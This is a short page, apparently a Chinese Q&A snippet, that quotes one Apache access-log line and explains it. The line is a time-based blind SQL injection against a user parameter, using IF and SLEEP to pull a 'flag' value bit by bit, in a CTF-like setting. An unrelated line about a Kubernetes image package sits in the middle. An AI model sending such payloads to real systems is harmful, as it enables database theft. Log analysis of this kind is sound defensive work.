10.0.1.1 - - [01/Mar/2015:13:15:07 -0500] "GET /backend.php?user=admin' AND IF(/*W7Pfbxn*/SUBSTRING(REVERSE(/*9bx23*/CONV(HEX(SUBSTRING(/*TM4fTNJ*/(SELECT GROUP_CONCAT(CONCAT(flag)) FROM chart_db.flag/*FQ*/),1,1)),16,2))/*bfj7i*/,4,1)=1,SLEEP(2),5557891) AND '5286913 HTTP/1.1" 200 431 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0"
时间: 2024-01-01 11:04:16 浏览: 283
k8s.gcr.io/defaultbackend-amd64:1.5镜像包
这是一条 Apache 访问日志,记录了某个时间点的服务器访问请求。其中包含了请求的IP地址、请求方法、请求的URL以及请求时使用的浏览器和操作系统等信息。这个 URL 看起来像是一个后端的 PHP 接口,其中包含了一个 SQL 注入攻击的 payload。注入点可能位于 user 参数的位置。请求中使用了 IF 函数和 SLEEP 函数,通过控制其条件语句的真假性和延迟时间,来判断是否存在 SQL 注入漏洞。
阅读全文